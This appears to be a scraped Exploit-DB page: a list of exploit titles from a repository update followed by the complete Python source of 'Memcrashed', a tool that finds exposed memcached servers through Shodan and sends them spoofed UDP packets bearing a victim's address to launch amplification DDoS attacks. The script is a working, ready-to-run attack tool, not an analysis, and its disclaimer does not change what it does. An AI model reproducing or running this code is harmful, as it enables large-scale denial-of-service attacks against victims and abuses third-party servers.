
1979 changes to exploits/shellcodes Couchdb 1.5.0 - 'uuids' Denial of Service Apache CouchDB 1.5.0 - 'uuids' Denial of Service Beyond Remote 2.2.5.3 - Denial of Service (PoC) udisks2 2.8.0 - Denial of Service (PoC) Termite 3.4 - Denial of Service (PoC) SoftX FTP Client 3.3 - Denial of Service (PoC) Silverstripe 2.3.5 - Cross-Site Request Forgery / Open redirection SilverStripe CMS 2.3.5 - Cross-Site Request Forgery / Open Redirection Silverstripe CMS 3.0.2 - Multiple Vulnerabilities SilverStripe CMS 3.0.2 - Multiple Vulnerabilities Silverstripe CMS 2.4 - File Renaming Security Bypass SilverStripe CMS 2.4 - File Renaming Security Bypass Silverstripe CMS 2.4.5 - Multiple Cross-Site Scripting Vulnerabilities SilverStripe CMS 2.4.5 - Multiple Cross-Site Scripting Vulnerabilities Silverstripe CMS 2.4.7 - 'install.php' PHP Code Injection SilverStripe CMS 2.4.7 - 'install.php' PHP Code Injection Silverstripe Pixlr Image Editor - 'upload.php' Arbitrary File Upload SilverStripe CMS Pixlr Image Editor - 'upload.php' Arbitrary File Upload Silverstripe CMS 2.4.x - 'BackURL' Open Redirection SilverStripe CMS 2.4.x - 'BackURL' Open Redirection Silverstripe CMS - 'MemberLoginForm.php' Information Disclosure SilverStripe CMS - 'MemberLoginForm.php' Information Disclosure Silverstripe CMS - Multiple HTML Injection Vulnerabilities SilverStripe CMS - Multiple HTML Injection Vulnerabilities Apache CouchDB 1.7.0 and 2.x before 2.1.1 - Remote Privilege Escalation Apache CouchDB 1.7.0 / 2.x < 2.1.1 - Remote Privilege Escalation Monstra CMS before 3.0.4 - Cross-Site Scripting Monstra CMS < 3.0.4 - Cross-Site Scripting (2) Monstra CMS < 3.0.4 - Cross-Site Scripting Monstra CMS < 3.0.4 - Cross-Site Scripting (1) Navigate CMS 2.8 - Cross-Site Scripting Collectric CMU 1.0 - 'lang' SQL injection Joomla! Component CW Article Attachments 1.0.6 - 'id' SQL Injection LG SuperSign EZ CMS 2.5 - Remote Code Execution MyBB Visual Editor 1.8.18 - Cross-Site Scripting Joomla! Component AMGallery 1.2.3 - 'filter_category_id' SQL Injection Joomla! Component Micro Deal Factory 2.4.0 - 'id' SQL Injection RICOH Aficio MP 301 Printer - Cross-Site Scripting Joomla! Component Auction Factory 4.5.5 - 'filter_order' SQL Injection RICOH MP C6003 Printer - Cross-Site Scripting Linux/ARM - Egghunter (PWN!) + execve(_/bin/sh__ NULL_ NULL) Shellcode (28 Bytes) Linux/ARM - sigaction() Based Egghunter (PWN!) + execve(_/bin/sh__ NULL_ NULL) Shellcode (52 Bytes)
170 lines
No EOL
9.1 KiB
Python
Executable file
170 lines
No EOL
9.1 KiB
Python
Executable file
#-- coding: utf8 --
|
|
#!/usr/bin/python
|
|
# Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44265.zip
|
|
|
|
import sys, os, time, shodan
|
|
from pathlib import Path
|
|
from scapy.all import *
|
|
from contextlib import contextmanager
|
|
|
|
starttime=time.time()
|
|
|
|
@contextmanager
|
|
def suppress_stdout():
|
|
with open(os.devnull, "w") as devnull:
|
|
old_stdout = sys.stdout
|
|
sys.stdout = devnull
|
|
try:
|
|
yield
|
|
finally:
|
|
sys.stdout = old_stdout
|
|
|
|
class color:
|
|
HEADER = '\033[0m'
|
|
|
|
keys = Path("./api.txt")
|
|
logo = color.HEADER + '''
|
|
|
|
███╗ ███╗███████╗███╗ ███╗ ██████╗██████╗ █████╗ ███████╗██╗ ██╗███████╗██████╗
|
|
████╗ ████║██╔════╝████╗ ████║██╔════╝██╔══██╗██╔══██╗██╔════╝██║ ██║██╔════╝██╔══██╗
|
|
██╔████╔██║█████╗ ██╔████╔██║██║ ██████╔╝███████║███████╗███████║█████╗ ██║ ██║
|
|
██║╚██╔╝██║██╔══╝ ██║╚██╔╝██║██║ ██╔══██╗██╔══██║╚════██║██╔══██║██╔══╝ ██║ ██║
|
|
██║ ╚═╝ ██║███████╗██║ ╚═╝ ██║╚██████╗██║ ██║██║ ██║███████║██║ ██║███████╗██████╔╝
|
|
╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝╚═════╝
|
|
|
|
Author: @037
|
|
Version: 3.1
|
|
|
|
####################################### DISCLAIMER ########################################
|
|
| Memcrashed is a tool that allows you to use Shodan.io to obtain hundreds of vulnerable |
|
|
| memcached servers. It then allows you to use the same servers to launch widespread |
|
|
| distributed denial of service attacks by forging UDP packets sourced to your victim. |
|
|
| Default payload includes the memcached "stats" command, 10 bytes to send, but the reply |
|
|
| is between 1,500 bytes up to hundreds of kilobytes. Please use this tool responsibly. |
|
|
| I am NOT responsible for any damages caused or any crimes committed by using this tool. |
|
|
###########################################################################################
|
|
|
|
'''
|
|
print(logo)
|
|
|
|
if keys.is_file():
|
|
with open('api.txt', 'r') as file:
|
|
SHODAN_API_KEY=file.readlines()
|
|
else:
|
|
file = open('api.txt', 'w')
|
|
SHODAN_API_KEY = input('[*] Please enter a valid Shodan.io API Key: ')
|
|
file.write(SHODAN_API_KEY)
|
|
print('[~] File written: ./api.txt')
|
|
file.close()
|
|
|
|
while True:
|
|
api = shodan.Shodan(SHODAN_API_KEY)
|
|
print('')
|
|
try:
|
|
myresults = Path("./bots.txt")
|
|
query = input("[*] Use Shodan API to search for affected Memcached servers? <Y/n>: ").lower()
|
|
if query.startswith('y'):
|
|
print('')
|
|
print('[~] Checking Shodan.io API Key: %s' % SHODAN_API_KEY)
|
|
results = api.search('product:"Memcached" port:11211')
|
|
print('[✓] API Key Authentication: SUCCESS')
|
|
print('[~] Number of bots: %s' % results['total'])
|
|
print('')
|
|
saveresult = input("[*] Save results for later usage? <Y/n>: ").lower()
|
|
if saveresult.startswith('y'):
|
|
file2 = open('bots.txt', 'a')
|
|
for result in results['matches']:
|
|
file2.write(result['ip_str'] + "\n")
|
|
print('[~] File written: ./bots.txt')
|
|
print('')
|
|
file2.close()
|
|
saveme = input('[*] Would you like to use locally stored Shodan data? <Y/n>: ').lower()
|
|
if myresults.is_file():
|
|
if saveme.startswith('y'):
|
|
ip_arrayn = []
|
|
with open('bots.txt') as my_file:
|
|
for line in my_file:
|
|
ip_arrayn.append(line)
|
|
ip_array = [s.rstrip() for s in ip_arrayn]
|
|
else:
|
|
print('')
|
|
print('[✘] Error: No bots stored locally, bots.txt file not found!')
|
|
print('')
|
|
if saveme.startswith('y') or query.startswith('y'):
|
|
print('')
|
|
target = input("[▸] Enter target IP address: ")
|
|
power = int(input("[▸] Enter preferred power (Default 1): ") or "1")
|
|
data = input("[▸] Enter payload contained inside packet: ") or "\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n"
|
|
print('')
|
|
if query.startswith('y'):
|
|
iplist = input('[*] Would you like to display all the bots from Shodan? <Y/n>: ').lower()
|
|
if iplist.startswith('y'):
|
|
print('')
|
|
counter= int(0)
|
|
for result in results['matches']:
|
|
host = api.host('%s' % result['ip_str'])
|
|
counter=counter+1
|
|
print('[+] Memcache Server (%d) | IP: %s | OS: %s | ISP: %s |' % (counter, result['ip_str'], host.get('os', 'n/a'), host.get('org', 'n/a')))
|
|
time.sleep(2.0 - ((time.time() - starttime) % 2.0))
|
|
if saveme.startswith('y'):
|
|
iplistlocal = input('[*] Would you like to display all the bots stored locally? <Y/n>: ').lower()
|
|
if iplistlocal.startswith('y'):
|
|
print('')
|
|
counter= int(0)
|
|
for x in ip_array:
|
|
host = api.host('%s' % x)
|
|
counter=counter+1
|
|
print('[+] Memcache Server (%d) | IP: %s | OS: %s | ISP: %s |' % (counter, x, host.get('os', 'n/a'), host.get('org', 'n/a')))
|
|
time.sleep(2.0 - ((time.time() - starttime) % 2.0))
|
|
print('')
|
|
engage = input('[*] Ready to engage target %s? <Y/n>: ' % target).lower()
|
|
if engage.startswith('y'):
|
|
if saveme.startswith('y'):
|
|
for i in ip_array:
|
|
if power>1:
|
|
print('[+] Sending %d forged UDP packets to: %s' % (power, i))
|
|
with suppress_stdout():
|
|
send(IP(src=target, dst='%s' % i) / UDP(dport=11211)/Raw(load=data), count=power)
|
|
elif power==1:
|
|
print('[+] Sending 1 forged UDP packet to: %s' % i)
|
|
with suppress_stdout():
|
|
send(IP(src=target, dst='%s' % i) / UDP(dport=11211)/Raw(load=data), count=power)
|
|
else:
|
|
for result in results['matches']:
|
|
if power>1:
|
|
print('[+] Sending %d forged UDP packets to: %s' % (power, result['ip_str']))
|
|
with suppress_stdout():
|
|
send(IP(src=target, dst='%s' % result['ip_str']) / UDP(dport=11211)/Raw(load=data), count=power)
|
|
elif power==1:
|
|
print('[+] Sending 1 forged UDP packet to: %s' % result['ip_str'])
|
|
with suppress_stdout():
|
|
send(IP(src=target, dst='%s' % result['ip_str']) / UDP(dport=11211)/Raw(load=data), count=power)
|
|
print('')
|
|
print('[•] Task complete! Exiting Platform. Have a wonderful day.')
|
|
break
|
|
else:
|
|
print('')
|
|
print('[✘] Error: %s not engaged!' % target)
|
|
print('[~] Restarting Platform! Please wait.')
|
|
print('')
|
|
else:
|
|
print('')
|
|
print('[✘] Error: No bots stored locally or remotely on Shodan!')
|
|
print('[~] Restarting Platform! Please wait.')
|
|
print('')
|
|
|
|
except shodan.APIError as e:
|
|
print('[✘] Error: %s' % e)
|
|
option = input('[*] Would you like to change API Key? <Y/n>: ').lower()
|
|
if option.startswith('y'):
|
|
file = open('api.txt', 'w')
|
|
SHODAN_API_KEY = input('[*] Please enter valid Shodan.io API Key: ')
|
|
file.write(SHODAN_API_KEY)
|
|
print('[~] File written: ./api.txt')
|
|
file.close()
|
|
print('[~] Restarting Platform! Please wait.')
|
|
print('')
|
|
else:
|
|
print('')
|
|
print('[•] Exiting Platform. Have a wonderful day.')
|
|
break |